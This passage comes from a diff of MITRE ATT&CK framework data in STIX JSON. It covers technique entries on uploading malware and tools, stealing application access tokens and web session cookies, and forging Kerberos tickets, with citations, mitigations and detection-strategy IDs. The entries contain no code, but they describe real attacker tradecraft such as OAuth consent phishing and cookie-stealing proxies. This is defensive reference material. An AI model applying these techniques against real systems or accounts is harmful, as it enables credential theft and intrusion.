+                            "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.",
+                            "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf"
+                        },
+                        {
+                            "source_name": "iOS URL Scheme",
+                            "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.",
+                            "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html"
+                        },
+                        {
+                            "source_name": "Intezer App Service Phishing",
+                            "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.",
+                            "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/"
+                        },
+                        {
+                            "source_name": "Proofpoint TA407 September 2019",
+                            "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.",
+                            "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian"
+                        },
+                        {
+                            "source_name": "Cofense-redirect",
+                            "description": "Raymond, Nathaniel. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved January 17, 2024.",
+                            "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/"
+                        },
+                        {
+                            "source_name": "mandiant-masking",
+                            "description": "Simonian, Nick. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved January 17, 2024.",
+                            "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein",
+                        "Hen Porcilan",
+                        "Diyar Saadi Ali",
+                        "Nikola Kovac"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.683000+00:00\", \"old_value\": \"2025-10-24 17:49:03.552000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0893: Detection of Link Target"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-03-17 20:09:13.222000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Upload Malware",
+                    "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)(Citation: Guardio Etherhiding 2023)(Citation: Bleeping Computer Binance Smart Chain 2023)\n\nAdversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM).(Citation: Datadog Security Labs Malicious PyPi Packages 2024) By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1608/001",
+                            "external_id": "T1608.001"
+                        },
+                        {
+                            "source_name": "Datadog Security Labs Malicious PyPi Packages 2024",
+                            "description": " Sebastian Obregoso  and Christophe Tafani-Dereeper. (2024, May 23). Malicious PyPI packages targeting highly specific MacOS machines. Retrieved May 22, 2025.",
+                            "url": "https://securitylabs.datadoghq.com/articles/malicious-pypi-package-targeting-highly-specific-macos-machines/"
+                        },
+                        {
+                            "source_name": "Volexity Ocean Lotus November 2020",
+                            "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.",
+                            "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"
+                        },
+                        {
+                            "source_name": "Bleeping Computer Binance Smart Chain 2023",
+                            "description": "Bill Toulas. (2023, October 13). Hackers use Binance Smart Chain contracts to store malicious scripts. Retrieved May 22, 2025.",
+                            "url": "https://www.bleepingcomputer.com/news/security/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/"
+                        },
+                        {
+                            "source_name": "Talos IPFS 2022",
+                            "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.",
+                            "url": "https://blog.talosintelligence.com/ipfs-abuse/"
+                        },
+                        {
+                            "source_name": "Guardio Etherhiding 2023",
+                            "description": "Nati Tal and Oleg Zaytsev. (2023, October 13). \u201cEtherHiding\u201d \u2014 Hiding Web2 Malicious Code in Web3 Smart Contracts. Retrieved May 22, 2025.",
+                            "url": "https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kobi Haimovich, CardinalOps",
+                        "Menachem Goldstein",
+                        "Adam Hunt",
+                        "Ray Jasinski"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2026-04-01 19:06:26.976000+00:00\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0824: Detection of Upload Malware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-03-17 20:31:07.828000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Upload Tool",
+                    "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1608/002",
+                            "external_id": "T1608.002"
+                        },
+                        {
+                            "source_name": "Dell TG-3390",
+                            "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.",
+                            "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
+                        },
+                        {
+                            "source_name": "Malwarebytes Heroku Skimmers",
+                            "description": "J\u00e9r\u00f4me Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.",
+                            "url": "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku"
+                        },
+                        {
+                            "source_name": "Dragos Heroku Watering Hole",
+                            "description": "Kent Backman. (2021, May 18). When Intrusions Don\u2019t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.",
+                            "url": "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/"
+                        },
+                        {
+                            "source_name": "Intezer App Service Phishing",
+                            "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.",
+                            "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2025-10-24 17:48:46.160000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0834: Detection of Upload Tool"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-04 15:54:25.684000+00:00",
+                    "modified": "2026-05-12 15:12:00.694000+00:00",
+                    "name": "Steal Application Access Token",
+                    "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container\u2019s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  \n\nSimilarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. \n\nIn Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1528",
+                            "external_id": "T1528"
+                        },
+                        {
+                            "source_name": "Amnesty OAuth Phishing Attacks, August 2019",
+                            "description": "Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.",
+                            "url": "https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/"
+                        },
+                        {
+                            "source_name": "SpecterOps Managed Identity 2022",
+                            "description": "Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.",
+                            "url": "https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c"
+                        },
+                        {
+                            "source_name": "Auth0 Understanding Refresh Tokens",
+                            "description": "Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved November 17, 2024.",
+                            "url": "https://auth0.com/learn/refresh-tokens"
+                        },
+                        {
+                            "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019",
+                            "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.",
+                            "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"
+                        },
+                        {
+                            "source_name": "Cider Security Top 10 CICD Security Risks",
+                            "description": "Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20220316130828/https://www.cidersecurity.io/top-10-cicd-security-risks/"
+                        },
+                        {
+                            "source_name": "Trend Micro Pawn Storm OAuth 2017",
+                            "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks"
+                        },
+                        {
+                            "source_name": "Kubernetes Service Accounts",
+                            "description": "Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.",
+                            "url": "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/"
+                        },
+                        {
+                            "source_name": "Entra Managed Identities 2025",
+                            "description": "Microsoft Entra. (2025, February 27). How to use managed identities for Azure resources on an Azure VM to acquire an access token. Retrieved March 18, 2025.",
+                            "url": "https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token"
+                        },
+                        {
+                            "source_name": "Microsoft - Azure AD Identity Tokens - Aug 2019",
+                            "description": "Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"
+                        },
+                        {
+                            "source_name": "Microsoft - Azure AD App Registration - May 2019",
+                            "description": "Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app"
+                        },
+                        {
+                            "source_name": "Microsoft - OAuth Code Authorization flow - June 2019",
+                            "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow"
+                        },
+                        {
+                            "source_name": "Microsoft Identity Platform Protocols May 2019",
+                            "description": "Microsoft. (n.d.). Retrieved September 12, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Suzy Schapperle - Microsoft Azure Red Team",
+                        "Shailesh Tiwary (Indian Army)",
+                        "Mark Wee",
+                        "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
+                        "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
+                        "Ram Pliskin, Microsoft Azure Security Center",
+                        "Jack Burns, HubSpot",
+                        "Arun Seelagan, CISA",
+                        "Eliraz Levi, Hunters Security",
+                        "Alon Klayman, Hunters Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.694000+00:00\", \"old_value\": \"2025-10-24 17:49:04.660000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1021: Restrict Web-Based Content",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0515: Detection Strategy for T1528 - Steal Application Access Token"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-10-08 20:04:35.508000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Steal Web Session Cookie",
+                    "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1539",
+                            "external_id": "T1539"
+                        },
+                        {
+                            "source_name": "Krebs Discord Bookmarks 2023",
+                            "description": "Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.",
+                            "url": "https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/"
+                        },
+                        {
+                            "source_name": "Unit 42 Mac Crypto Cookies January 2019",
+                            "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"
+                        },
+                        {
+                            "source_name": "Kaspersky TajMahal April 2019",
+                            "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019.",
+                            "url": "https://securelist.com/project-tajmahal/90240/"
+                        },
+                        {
+                            "source_name": "Github evilginx2",
+                            "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.",
+                            "url": "https://github.com/kgretzky/evilginx2"
+                        },
+                        {
+                            "source_name": "GitHub Mauraena",
+                            "description": "Orr\u00f9, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.",
+                            "url": "https://github.com/muraenateam/muraena"
+                        },
+                        {
+                            "source_name": "Pass The Cookie",
+                            "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.",
+                            "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"
+                        },
+                        {
+                            "source_name": "Talos Roblox Scam 2023",
+                            "description": "Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game \u201cRoblox\u201d. Retrieved January 2, 2024.",
+                            "url": "https://blog.talosintelligence.com/roblox-scam-overview/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Microsoft Threat Intelligence Center (MSTIC)",
+                        "Johann Rehberger",
+                        "Menachem Goldstein",
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-24 17:48:25.272000+00:00\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1021: Restrict Web-Based Content",
+                            "M1032: Multi-factor Authentication",
+                            "M1047: Audit",
+                            "M1051: Update Software",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0509: Detection of Web Session Cookie Theft via File, Memory, and Network Artifacts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:12:46.830000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Steal or Forge Kerberos Tickets",
+                    "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \u201crealms\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1558",
+                            "external_id": "T1558"
+                        },
+                        {
+                            "source_name": "CERT-EU Golden Ticket Protection",
+                            "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.",
+                            "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Detecting Kerberoasting Feb 2018",
+                            "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.",
+                            "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"
+                        },
+                        {
+                            "source_name": "Medium Detecting Attempts to Steal Passwords from Memory",
+                            "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.",
+                            "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"
+                        },
+                        {
+                            "source_name": "Stealthbits Detect PtT 2019",
+                            "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.",
+                            "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks"
+                        },
+                        {
+                            "source_name": "AdSecurity Cracking Kerberos Dec 2015",
+                            "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.",
+                            "url": "https://adsecurity.org/?p=2293"
+                        },
+                        {
+                            "source_name": "ADSecurity Detecting Forged Tickets",
+                            "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.",
